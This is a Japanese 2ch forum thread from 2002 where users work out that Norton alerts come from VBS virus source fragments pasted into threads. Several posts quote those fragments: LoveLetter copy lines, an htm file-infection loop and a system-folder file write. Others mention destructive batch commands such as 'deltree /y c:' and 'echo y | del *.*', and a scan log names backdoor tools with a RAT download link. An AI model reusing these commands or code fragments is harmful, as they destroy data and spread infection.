いや PCをフォーマットするコードとかをマッチングさせる。だと ユーティリティ系ソフトで激しく誤検出されるでしょう。 本来は、いわゆる狭義のウィルス(感染・潜伏・発病) の場合、感染させるコードに必ず一致するバイナリがあるわけで そこをマッチングさせるんだけど。 今広まってるような、単にパソコン破壊するプログラムみたいな ウンコみたいなウィルスのできそこない(まあ、広義のトロイだけど)で 特にvbsで作られてるのだと、ソースそのまんまだから 自らを主張するコードはできるだけ入らないようになるわけ。 だからパターンのマッチングが難しくて、全部ソースそのままという事も あり、誤反応が多いんだよね。なんなんだか
357 :
↑ :02/07/06 20:16 ID:???
359 :
↑ :02/07/06 20:22 ID:???
単に、今の話だと誤解を招きそうだったから。 deltree /y c:って内容のhoge.batが広まっても deltreeをマッチングさせるのは問題があるよんってだけ
hoge.batなんて広まるかな?
>>361 Win MX日本優良サーバーリスト8種(Wクリック自動登録タイプ).bat
中には無数のecho y | del *.*
後、autoexec.bat書き換えて無限ループとか。
結構な人数が引っかかったw
wink****.exe って検索して何もでてこなければ Klezに感染してないって言えるの?
366 :
ひよこ名無しさん :02/07/06 23:52 ID:ofh5EVc+
2ch中に急にVBS.Loveletter.Aに感染しました。(警告がでた) exe,メール等はしてないのですが・・ ブラウザはIE,ノートンでその後スキャンしても、 出てきません。 コレは一体??
>>366 ウイルススレに逝きなさい!書いてあるから
>>366 あなたと同じ質問をした人が、今までに2048人いました。
>>367 てか、ラスト50位のレス読もうよ、
って事で。
370 :
ひよこ名無しさん :02/07/06 23:58 ID:ofh5EVc+
すいません。テンパッテますた。 過去ログ読んで逝って来ます。(激しく反省。
>>371 ×おちょこちょい
○おっちょこちょいw
おっちょちょこいだねぇ(笑)
おっちょこちょいですた!反省中・・・
VBS.Loveletter.Aの話題で盛り上がってる所、申し訳ないのですが・・・ 2週間以上前から、klezを毎日1~2通受信し続けていて、とりあえず自分は 対策ソフト入れてますし、7/6になればそいつのPCがアボーンしもう来ないだろうと 我慢していたのですが、今日(7/6)も、また来ていました。 感染しなくとも、非常にウザイのですが誰かもわからない相手が、気付くのを 待ちつづけるしかないのでしょうか?
>>375 自分のメアド登録してるヤシ全員に警告メール出せば
>>375 神経質過ぎ!ネットやめちゃえよ!!禿げるよ、マジで。
>>129 >>132 あーぁ、出るようになっちまったのかよ。つまんねぇ。
警告出なかったから面白かったのに。
これじゃ初心者しか攻撃できねぇよ。
>>365 ファイル検索で該当ファイルを検索する方法は、それだけに頼ると
いつか痛い目に遭うよ。
>>375 送信者を禁止に。
>>381 忙しくて暇がない、あってもお疲れ、そんで新しい情報にも疎くなったし・・・
それでもなんとかわかる範囲でたまには回答してみたり(w
c.Copy(dirsystem&"\うんこ臭い.TXT.vbs")
385 :
ひよこ名無しさん :02/07/07 01:40 ID:txVtHwPB
すいません。質問させてください。 いつも出入りしてる板のあるスレにこんなレスがあったんです。 ぜんぜん気にしなくていいんですか? 468 名前:このスレはウイルスに感染しています :02/07/07 01:30 If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l", truefso.CopyFile HostPath, f1.path, trueEnd IfNext
387 :
ひよこ名無しさん :02/07/07 01:55 ID:KRCY8pgU
いま、ニュー即+のリュウスケチャンがどうたらこうたらと言うスレでウィルスを戴きました。 えーん。
388 :
ひよこ名無しさん :02/07/07 01:55 ID:I8yZKy5A
389 :
ひよこ名無しさん :02/07/07 01:57 ID:KRCY8pgU
ここにも張ってあるのか。 エーん。
391 :
ひよこ名無しさん :02/07/07 01:58 ID:I8yZKy5A
385です。 貼るだけでみんなに迷惑がかかるようなものなのですか。 本当にごめんなさい。
>>391 君のせいで迷惑を蒙った。どうしてくれるんだ!( ゚Д゚)ゴルァ!
394 :
385 :02/07/07 02:04 ID:3u0Xhz5R
>>390 ,392
誘導ありがとうございます。今さらっと見てきました。
この後じっくり読みたいと思います。
ほんとうにありがとうございました。
395 :
385 :02/07/07 02:05 ID:3u0Xhz5R
397 :
389 :02/07/07 02:07 ID:KRCY8pgU
ノートンユーザーはこのスレうるさいんだろうな…
>>398 マジでウザいよ!反応しまくりだからねぇ・・・
2chの自作板の「ウイルス(玄人)志向」のスレを みてるといつもラブレターに感染とノートンが 騒ぎ立てるが・・・ネタでなくマジ
かちゅ〜しゃとか使ってる人はログ削除して取得しなおしてあぼ〜んすりゃいいのか?
>>401 だと思うんだけど、あぼ〜んする場所探すのが大変
>>401 このスレだと、176/273/326/384/385をあぼ〜んすれば反応しなくなると思う。
コードっぽいのは全部あぼ〜んすればいい。
だけど、あぼ〜んする時はノートンを止めないといけないし面倒だから
除外するのがラク。薦めないけどね。
405 :
ひよこ名無しさん :02/07/07 03:44 ID:ttbZ24vN
さっき2ちゃんをしていたら VBS.Internalと言うウイルスハケーン!>(;゚Д゚) とノーdに言われました。 とりあえず隔離して削除したんですが、この場合後遺症とかありますか? 一応そのあとスキャンしたらなんにもありませんでした。 また上記の時はリンク先に飛んだわけでもなく 普通に2ちゃんを見ていただけなのですが、 突然ノートンが発見するってことは 普段からコンピューター内を巡回してるのかな? 最近WC関係で色々なサイトに飛んでるから どこかで一緒に拾ってきてしまったのかな。。。
( ゚д゚)ポカーン...
( ゚д゚)すげぇや…
409 :
ひよこ名無しさん :02/07/07 03:52 ID:ttbZ24vN
>>407 すぐ上ってどのへんっすか?誘導してくれるとうれしーです。
1−20辺りまでしか読んで無かったです。。
>>409 WC関連というと、TOTOとかINAX関連ですか?
最新50も読めない人は消えてください
具体的に言うと
>>385-404 DEATH
413 :
ひよこ名無しさん :02/07/07 04:00 ID:ttbZ24vN
誠にすいません。 以前は質問する時は最新50を見てたんだけど、 似た質問がいつも無いもので、最近見てなくて。。。 反省しますた。
消えて下さいは言い過ぎだと思うけど どっかのスレで引っかかったなら 他にも被害者がいるはず->既出の質問->検索 と考えて欲しいなぁ
2ch閲覧とノートンの警告とが関係あるとは思わなかったんだろうさ。
417 :
ひよこ名無しさん :02/07/07 04:09 ID:ttbZ24vN
暴言を吐きつつも教えてくれて実はとってもいい人なんだぁー
と思ってます。
>>415 どこのスレで引っかかったのかよくわかんないんです。
雑談系の板なんで。。。
あとWC関係で逝ったサイトで拾ってきたフラッシュ等に
ウイルスがあったりしたのかなぁ、とも思ってました。
出所がよく分からなかったんで質問させていただきますた。。
すいませんす。
>>417 なんで
>>1-20 を読んでいるのにフラッシュとかDLしてスキャンしないんだ?
DLしたらスキャンする、当然だろ?
暴言なんて2chじゃ挨拶みたいなもんだろ(w それが嫌なら2chに来なけりゃいい 他にもいろいろあるんだからな
420 :
ひよこ名無しさん :02/07/07 04:18 ID:ttbZ24vN
まだ見てなかったから、あとでいいかなと思って。 べつにフラッシュに確実にある!と思ってたわけじゃなく どっかのサイトに行ったときにもらって来たのかなぁとかも思ったり。 ブラクラチェッカーやって飛んだわけじゃなかったんで。。。 普段、安全そうなサイト以外リンク先に飛ばないんだけど 今回ちょっとWCではしゃぎすぎますた。 反省。 それでちょっと不安になって。
>>420 ダウンロードファイルをウイルススキャンしない理由になってない
422 :
ひよこ名無しさん :02/07/07 04:20 ID:ttbZ24vN
次はもうちょっと調べてからちゃんと質問します。 どうもありがd。
423 :
ひよこ名無しさん :02/07/07 04:22 ID:ttbZ24vN
>>421 いや、後で(フラッシュを)見るときに(スキャン)しようと思ってました、
というニュアンスで書いたんですけど。。
ニュアンスとか言ってないで明記しろよ。 それはさておき、そもそもファイル感染型ウイルスに対する 認識がまちがってる。
確かに。感染したら駆除すればいい、とか考えてるやつ多いね。 ガードしてこそのアンチウィルスソフトなのに…
こういうヤシに限って1年前の定義ファイルだったりするんだ、これが。
一人で絡んで楽しいのか。 スルーしろ。
thorough though though through thorough though thorough
いやいや、おまえもスルーしろ
434 :
:02/07/07 08:08 ID:zIFMDvwA
VBS.Network VBS .Internal VBS .Love letter.A 2chを見てただけなのにこれがウィルスとして出できた場合誤作動です 気にせず2chを見続けなさい
ウイルスでしょうか?なんて質問する前にスキャンしる
そだ! ウイルスでしょうか?なんて聞き飽きた
なんで「ウイルスでしょうか?」って質問を禁止しないんだろう・・・
誰もテンプレに追加しようとしないあkら
2チャンしてたら二日続けて VBS .Internalを検出。 心臓に悪いよ。このスレ読んで納得。 削除しきれてなくてまた感染したのかと思った。 web制作のどこかのスレだな。
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ 1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。
基本(この問題について)
>>2 既知の2chで話題になってるvbsソース
>>3 2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。
3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■
・VBS.Internal
出元は
http://tmp.2ch.net/test/read.cgi/download/1025717301/ の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?
442 :
ひみつの検疫さん :2024/12/22(日) 21:19:51 ID:MarkedRes
汚染を除去しました。
どっかに隔離スレあったろ?そこへの誘導リンクだけにしてくれ。コード貼るなよ。
あー。むかつく。ここしばらくsage進行してください。 上にあると初心者スレあけるだけでもいちいちチェック 入りますんで
お前にむかついた。
>>444 じゃ、違うとこでスレッド出せば良いじゃん…
test
best
このスレはさげでよろしこ。 のーとんが五月蝿くて・・・
>>450 あー。むかつく。ここしばらくsage進行してください。
上にあると初心者スレあけるだけでもいちいちチェック
入りますんで
お前がむかつく
c.Copy(dirsystem&"\ ふざけるな! .TXT.vbs")
だから、どっか行けってばさ。
age
あgr
あの〜・・・ ウイルスに感染したみたいなんですけど・・ なんかスレ開いた瞬間に。 新種のウイルスでしょうか? アタフタしてます。 助けてください。
>458 今すぐネットから切断して ウィルス対策ソフトを買ってきてそれで駆除しなさい その状態でネットにつないでいるだけで 君が知らないうちにウィルスをばら撒き他人に迷惑をかけます 最悪の場合、企業が被害を被って億単位の損害賠償を請求されます
>>458 さげ、じゃねーよカス
質問時のルールも守れねーのかノータリン
脳味噌まで悪質なウイルスにやられてんじゃねーのか?
二度と来んな氏ねボケ
463 :
:02/07/07 19:45 ID:???
そんなことよりさ、ちょいと聞いてくれよ。スレにあんま関係ないんだけどさ。 このあいだ、久々に2ch覗いたんです。2ch。 そしたらなんか半角板のスレ開いたらパソコンが変な動きするんです。 で、よく見たらなんかノーd先生が警告出して騒いでるんです。 で、ウイルススレ見てみたらどうやら原因は先生の誤反応なんです。 もうね、先生アホかと。馬鹿かと。 先生な、普段仕事してないのに厨房コピペに一々反応なんかすんな、ボケが。 厨房のコピペだよ、コピペ。 なんか親子連れとかも助けてレスしてるし。一家4人で誤反応か。おめでてーな。 よーしパパセキュリティー板で原因聞いちゃうぞー、とか言ってるの。もう見てらんない。 お前らな、マカフィーやるから安心しろと。 誤反応ってのはな、もっと殺伐としてるべきなんだよ。 ノーd先生がいつ誤反応しちまってもおかしくない、 反応するか反応しないかの、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。 で、やっと騒ぎが収まったかと思うと、ウイルス対策スレがいっぱい立ってるんです。 そこでまたぶち切れですよ。 あのな、対策スレなんてきょうび流行んねーんだよ。ボケが。 得意げな顔して何が、誤反応に注意!だ。 お前は本当に2chネラーかと問いたい。問い詰めたい。小1時間問い詰めたい。 お前、他人から仕入れたその場限りの知識で自慢したいだけとちゃうんかと。 先生通の俺から言わせてもらえば今、先生通の間での最新流行はやっぱり、 コールセンターに電話、これだね。 あのー誤反応がすごいんですけど。厨房対策に誤反応多めにしてくれ。これが通の頼み方。 しかしこれを頼むと次から死満テックにマークされるという危険も伴う、諸刃の剣。 素人にはお薦め出来ない。 まあお前ら、ド素人は、マカフィーでもインストしてなさいってこった。
意味不明。
465 :
:02/07/07 19:55 ID:???
芸能速報板を見てる時にNorton先生が作動し、Temporary Filesを隔離。 ビクーリしてこのスレを訪れたが、そういうことだったのか。。。 落ち着いて過去レス読んでよかった。
藁江内
∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( ´Д`)< だから?って言われてモナー…… ( ) \____________ | | | (__)_)
470 :
:02/07/07 20:41 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1) ↑ これなに? なんかウイルスで引っかかったんだけど・・・
>>470 直訳してスペシャルフォルダの1(デスクトップ?スタートアップ?)にテキストファイル作成。
今流行ってる奴ですな。
>>470 マルチで貼り付けるな。氏ねよ・・・
∧_∧ _ _ .' , .. .∧__ >
( ´_ゝ`) _ .- ― .= ̄  ̄`:, .∴ ' ( 470 )
/ '' ̄ __――=', ・,‘ r⌒> _/ /
/ /\ / ̄\-―  ̄ ̄  ̄"'" . ’ | y'⌒ ⌒i
>>470 マルチで貼り付けるな。氏ね!バカ!!
∧_∧ _ _ .' , .. .∧__ >
( ´_ゝ`) _ .- ― .= ̄  ̄`:, .∴ ' ( 470 )
/ '' ̄ __――=', ・,‘ r⌒> _/ /
/ /\ / ̄\-―  ̄ ̄  ̄"'" . ’ | y'⌒ ⌒i
これなに? と原因を特定できてる時点で愉快犯決定。 500回氏ね。
>470 お前を削除したい。
またまどかタンのようにしばらくこの質問絶えないんだろうか…
>>478 多分な。ノートンが反応してオロオロするヤシばっか。
オートスキャン解除すればいいのか。
>>480 2ちゃん専用ブラウザを使っている場合は、
ログ保存フォルダを「除外」に設定すると(・∀・)イイ!!
NAV2002でウイルス定義最新、AutoProtectありで
>>470 のが別に反応しないんだけど、
すべてのノートンで反応する?
うちのスコット・ノートンは激しく反応しましたよ
486 :
ひよこ名無しさん :02/07/08 00:49 ID:e+/4p6zw
今日初めてシマンティックのオンラインスキャンというのをしたのですが その結果 c:\WINDOWS\Temporary Internet Files\Content.IE5\0DA7SXQB\l50[3] は 次のウィルスに感染しています: VBS.LoveLetter.A と、感染してるといわれました。 感染したのは2時間前らしいのですが何が原因かわかりません・・ 何をしたらいいのかもわからず、とりあえず感染したファイルを削除したのですが このウイルスについて調べるとファイルを書き換え・・と書かれてたので 対処法のページを色々読みました。 そしたらまず最新ウイルス定義をDLとかかれてたのでDLしようとしたんですけど どれをDLしたらいいのかわかりません。 どなたか詳しく教えてください・・お願いします。
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ 1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。
基本(この問題について)
>>2 既知の2chで話題になってるvbsソース
>>3 2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。
3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■
・VBS.Internal
出元は
http://tmp.2ch.net/test/read.cgi/download/1025717301/ の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?
>>486 もう一回スキャンかけてみれ。
んで、さっさとウィルス駆除ソフト買って来い。
490 :
ひよこ名無しさん :02/07/08 00:51 ID:e+/4p6zw
VBS.Freelink.Bに感染してから、妙にPCが重くなりました。 それとシステムのプロパティのシステムの復元ってとこを見ると「監視」になってたはずが CドライブもDドライブも停止になってます。 これはやはりウィルスのせいですか?それと対処方法を教えてください。 ちなみに最新版のノートン先生ではウィルス検出されなくなりました。
494 :
492 :02/07/08 01:00 ID:???
デフラグしようと見たら妙にCドライブの空きが少なくなってる・・・。
496 :
492 :02/07/08 01:07 ID:???
いま終わりましたが。 断片化されたファイルが増えてます。
>>496 つーか、IDも出さないヤシには、教えられんな
498 :
492 :02/07/08 01:14 ID:???
499 :
492 :02/07/08 01:14 ID:???
すみませんネタで下も浮きません
500 :
492 :02/07/08 01:15 ID:???
にせものはやめて下さい!
501 :
492 :02/07/08 01:16 ID:???
にせものは市ねよヴォケ・・・ ∧_∧ _ _ .' , .. .∧__ > ( ´_ゝ`) _ .- ― .= ̄  ̄`:, .∴ ' ( 偽者 ) / '' ̄ __――=', ・,‘ r⌒> _/ / / /\ / ̄\-―  ̄ ̄  ̄"'" . ’ | y'⌒ ⌒i
492は放置ケテーイ
503 :
492 :02/07/08 01:16 ID:KgzIDUyZ
ん?ここsage進行じゃないの? つか、またウィルス感染した・・・。
506 :
ひよこ名無しさん :02/07/08 01:18 ID:SbEa5ALr
ある日を境に、W32.Klez系のウィルスメールが日に10通ぐらい おくれらて来るようになってしまいました。アンチウィルスソフトを 入れてあるので、実害にはあっていませんが、とてもうざいです。 これって誰かに狙い打ちされてる可能性ってあるんでしょうか? それとも全てウィルスに感染した PCから送られてきてしまうものなのでしょうか? また全部見覚えのないアドレスばかりから送信されてくるのですが、 これらのアドレスはすべて本物なのでしょうか? それともフェイクのアドレスってことも ありえますか?
>>506 そんなもんほっとけば?ヤならネットすんなよ
509 :
492 :02/07/08 01:28 ID:KgzIDUyZ
初期化したばっかで消えてまずいファイルもないし、なんかおもしろいから しばらくほっとくことにします。ありがとう。
>>492 自分でシステムの復元を停止にしたのを忘れてるんじゃないの?
と言ってみるテスト。
システムの復元を停止にすればCドライブの空き容量も増えるし。
>>506 感染者が気づかないうちにKLEZが勝手に送信してるのがほとんど。
メルアドを詐称するのもKLEZの亜種の特徴。
メーラーの設定で送信者を禁止にするなど。
511 :
506 :02/07/08 01:34 ID:SbEa5ALr
>>510 ありがとうございました。ちょっと安心しました。
ほんと厨房でよくわかんないで。
512 :
ひよこ名無しさん :02/07/08 01:49 ID:hfeWW+8t
最近2chの板(なんの板かは忘れました)をクリックすると、 たまにノートンアンチウィルスが反応してvbs.network.eやvbs.loveletter.aが出るんです。 これはなぜですか? 普通のことなんですか? 厨房発言お許し下さい。
>>512 このスレッドを最初から最後まで読めばわかるよ。
全部読まなくてもちょっと上にもあるし。
まぁ一言で言えば誤作動。
516 :
512 :02/07/08 01:57 ID:hfeWW+8t
>>516 少なくとも、近々のレスは読んでから質問した方がいいよ
519 :
助けてください :02/07/08 02:27 ID:8iJMFnB4
windows meを使用しているのですが、ある日新しいソフトを買って インストールしようとしたら青い画面に切り替わってエラーの表示が 出ました。その後フリーズ状態になり、なんどくり返しても同じ状態 になります。又、普通のCDを入れても同じ状態になります。DVDソフトは 普通に再生できます。ウィルスかと思いウィルスバスターで検索したところ 、最後の方で又同じ症状になってしまいました。原因はなんなのでしょうか? またどうすれば直るのでしょうか?どうか助けてください。
>>519 リカバリ、これ最強にして最短です。はい
少し気になったんですが、同じような機能のソフトを複数
インストールしてませんか?OSが不安定になる事がまれにあります
521 :
長文失礼します :02/07/08 02:38 ID:BfvF6ldU
はじめてノートン先生にウイルス警告をもらってパニック状態です。 (LoveletterAとFreeLinkBとかいうやつです) このスレを参考に、インターネット一時ファイルは削除しました。 最新ウイルス定義でスキャンした限りでは感染も見つかっていません。 しかし、警告の前にはなかったDesktop.iniというファイルが 共有ドキュメントやら何やらあらゆる場所に出現しており、 削除しようとすると「システムファイルだから削除するとプログラムが 正常に動かなくなり云々」という表示が出てくるので どうしたらよいかわかりません。助けてください。 ファイルの中身は [DeleteOnCopy] Owner=Owner Personalized=(数字)……と始まるものです。 ちなみにここ数日、デスクトップ関係で思い当たることといえば シマンテックのサイトからfixlove.exeというLoveletter駆除ツールを デスクトップにDLしたことぐらいですが、何か関係があるのでしょうか。 それともやはりウイルスに感染してしまったのでしょうか。 無知ですみません。
>>521 ガイシュツ!ウイルススレに逝って下され
524 :
ひよこ名無しさん :02/07/08 02:41 ID:XtXy4CyE
変な質問すいません。 検疫とはどういう状態ですか? また、その場合はどうしたらいいのですか? 現在 VBS.Freelink.B VBS.Network.E に感染してます。 どちらも検疫状態です。 よろしくお願いします。
526 :
ひよこ名無しさん :02/07/08 03:14 ID:BfvF6ldU
>522-523 すみません。皆さんのレスを読む限りでは Desktop.iniというファイルが現れているのは自分だけのようなので とりあえずFixlove.exeをアンインストールしてみました。 しかし各フォルダにはまだDesktop.exeが残っています。 これは削除しても問題ないのかがわからず頭を痛めています。 ひょっとしたら別件に感染したのかと思ってこちらに書き込みました。
527 :
526 :02/07/08 03:16 ID:BfvF6ldU
訂正 ×Desktop.exe ○Desktop.ini です。
531 :
530 :02/07/08 03:22 ID:???
誰かぶってよ
533 :
530 :02/07/08 03:27 ID:???
(/Д\) イタイヨ
535 :
530 :02/07/08 03:34 ID:???
(・∀・)
537 :
530 :02/07/08 03:40 ID:???
( o^〜^)ノ
539 :
ひよこ名無しさん :02/07/08 03:45 ID:2yLWmQSH
VBS.LoveLetter.A (LoveLetter)に感染してしまいました。 ノートンでは修復できませんでした… どうしたら良いでしょうか?
>>539 質問の前に、最近のレスは読んでおこうよね
542 :
526 :02/07/08 03:58 ID:BfvF6ldU
皆さんどうもありがとうございました。これで安心して寝られます。
>>544 これねぇ。AVGはウィルス警備隊に勝った!(笑)
あ、ANTIDOTEがXPに対応してるし。ちょっと落とそう。
AGE
549 :
ひよこ名無しさん :02/07/09 01:41 ID:TG2PUJgq
先生!MXしてたらノートンさんが反応して ウィルスを検出して速攻で止めたのですが そういう事ってありえるんですかね? 何かブラウザか何かのクッキーが反応したのですが(ニムダ?
>>549 エムエクースと言った時点でまともなレスは無いぞw
>>549 MX(・A・)イクナイ (・∀・)カエレ!!
552 :
ひよこ名無しさん :02/07/09 01:56 ID:B787Q6GU
ノーd先生いれてたのに 感染したんだけど・・・・・ そういうことってあるの?
クリーン印須古最強
556 :
ひよこ名無しさん :02/07/09 02:03 ID:B787Q6GU
net デビル
557 :
ひよこ名無しさん :02/07/09 02:04 ID:LyDJUE3G
[email protected] って名前の添付ファイルがホットメールに送られてきたんですが・・・
ウイルス検知に引っかからなかったんで普通にDLしたんです。
でも気になったからさっき検索してみたらなんかウイルスみたいなページが出てきて・・・
これってやっぱりウイルスなんですか?どーやって駆除すればいいんですか?
教えてください(涙
560 :
ひよこ名無しさん :02/07/09 02:07 ID:LyDJUE3G
>>560 まさか・・・ウィルス対策をしていないとか?
562 :
ひよこ名無しさん :02/07/09 02:08 ID:B787Q6GU
563 :
ひよこ名無しさん :02/07/09 02:09 ID:LyDJUE3G
>>561 全く(w
今日初めてネット繋いだPCやし・・・・ハァ
>>563 とりあえずトレンドマイクロで検索してオンラインスキャンをしてこい。
早めに対策汁
>>563 じゃ、ダメじゃん!明日ウイルス対策ソフト買ってきなさい!
566 :
ひよこ名無しさん :02/07/09 02:12 ID:LyDJUE3G
>>564 トレンドマイクロって・・・ナンデスカ
みんな親切だな。かぶっちまった。
570 :
ひよこ名無しさん :02/07/09 02:15 ID:dIHqXkq2
572 :
ひよこ名無しさん :02/07/09 02:24 ID:B787Q6GU
573 :
ひよこ名無しさん :02/07/09 02:24 ID:B787Q6GU
574 :
ひよこ名無しさん :02/07/09 02:25 ID:B787Q6GU
575 :
557 :02/07/09 02:34 ID:LyDJUE3G
スキャンした結果ウイルス感染してませんでした! 皆さん本当にありがとうございました!
>>575 オンラインスキャンは「目安」だからな。明日ソフト買ってこいよ
578 :
557 :02/07/09 02:39 ID:LyDJUE3G
ファイル Server.exe 圧縮ファイルの中download.zip には Backdoor.NetDevil ウィルスが感染していました。ファイルは削除されました。 ウィルススキャンが完了しました。 スキャンした項目数:download.zip マスターブートレコード: スキャン:2 感染:0 修復:0 ブートレコード: スキャン:1 感染:0 修復:0 ファイル: スキャン:19 感染:1 修復:0_検疫:0 削除:1
ノートン大先生のスキャン結果 7月8日定義で対応?
http://www.lithiumrat.org/main.html ファイル srv_portscan.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル srv_funstuff.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル srv_pwinfo.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル srv_capture.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル LithiumServer.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/capture.lte 圧縮ファイルの中lithium101b.zip には Backdoor.Lithium.B ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/pwinfo.lte 圧縮ファイルの中lithium101b.zip には Backdoor.Lithium.B ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/funstuff.lte 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/default.ltf 圧縮ファイルの中lithium101b.zip には Backdoor.Lithium.B ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/example.lsf 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル cli_capture.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル Lithium.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル ServerEdit.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル SiN.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan.Clien ウィルスが感染しています。このファイルは検疫されました。
ウィルススキャンが完了しました。
スキャンした項目数:lithium101b.zip
マスターブートレコード: スキャン:2 感染:0
修復:0
ブートレコード: スキャン:1 感染:0
修復:0
ファイル: スキャン:26 感染:14
修復:0_検疫:14
削除:0
585 :
ひよこ名無しさん :02/07/09 21:23 ID:hn+Cap0o
W32.Duni.Wormに感染しますた… どうしよう…
>>585 今すぐ回線切ってウィルス削除して氏んでください
588 :
ひよこ名無しさん :02/07/09 21:32 ID:T2MmAQDs
友達に貸したら… スキャンもなにもデスクトップにダウンロードされてますよ! すでに、別の友達にメール送ってるみたいだ市…
591 :
ひよこ名無しさん :02/07/09 22:08 ID:HBAAckKM
ノートンのウィルス定義先ほど自動的に変わった。 定義ウィルス数61643って書かれていたけど 新種のウィルス「W32LiacA@mm」っていうやつに対しては このままで大丈夫かな。
>>591 LiveUpdateだろ?ウイルス対策に神経質になると禿るぞ!
593 :
591 :02/07/09 22:19 ID:HBAAckKM
>>592 そのとおりです。
でもウィルス対策に神経質になりますよ。
デマのウィルスも含めてだけどこう新種のウィルスが出現しては(あっこれ
たわいもない一人言です。スマソ)
>>593 少しでも知識があればそんなもん見分けられる。
>>593 じゃ、基本を守ってれば心配するな!ヤならネットやめるか?
596 :
591 :02/07/09 22:36 ID:HBAAckKM
>>595 基本守ってればいいんですね。アドバイスありがとうございます。
>>596 一応、本買って読んでおいた方がいいよ!
598 :
591 :02/07/09 23:02 ID:HBAAckKM
>>598 ウイルス定義の更新も忘れるなよ!あと、バックアップは定期的にしといた
方がいいとおもうなぁ・・・
2CHみてたらまたノートン先生が検疫へ逝けといいました。 はぁ〜。もうクレズもきてるし最近はやってるんだなぁ〜と実感。 プロバイダーのウィルスチェックだけにしなくてよかった。 ノートンのおかげで重くなっADSLなのに異常におそくなったけど・・・。
>>600 あんたはバカだから気付かなかったと思うがこのスレの一番最新のテンプレ読んでみ?
604 :
600 :02/07/09 23:59 ID:???
すみません初心者なもので・・・。
>>602 さんありがとうございました。
意味がわかりました。
>>603 増設したばかりです。多分大丈夫かと・・・。
どうせもう違う意味でこわれそうなPCですのでオークションにでも出そうかと。
まだいちおう動いているので。
>>604 ちょっと待て!オークションに出すならHDの内容ちゃんと消去しとかんと
ヤバいぞ!
>>604 そんな壊れそうなPCオークションにだすなよ
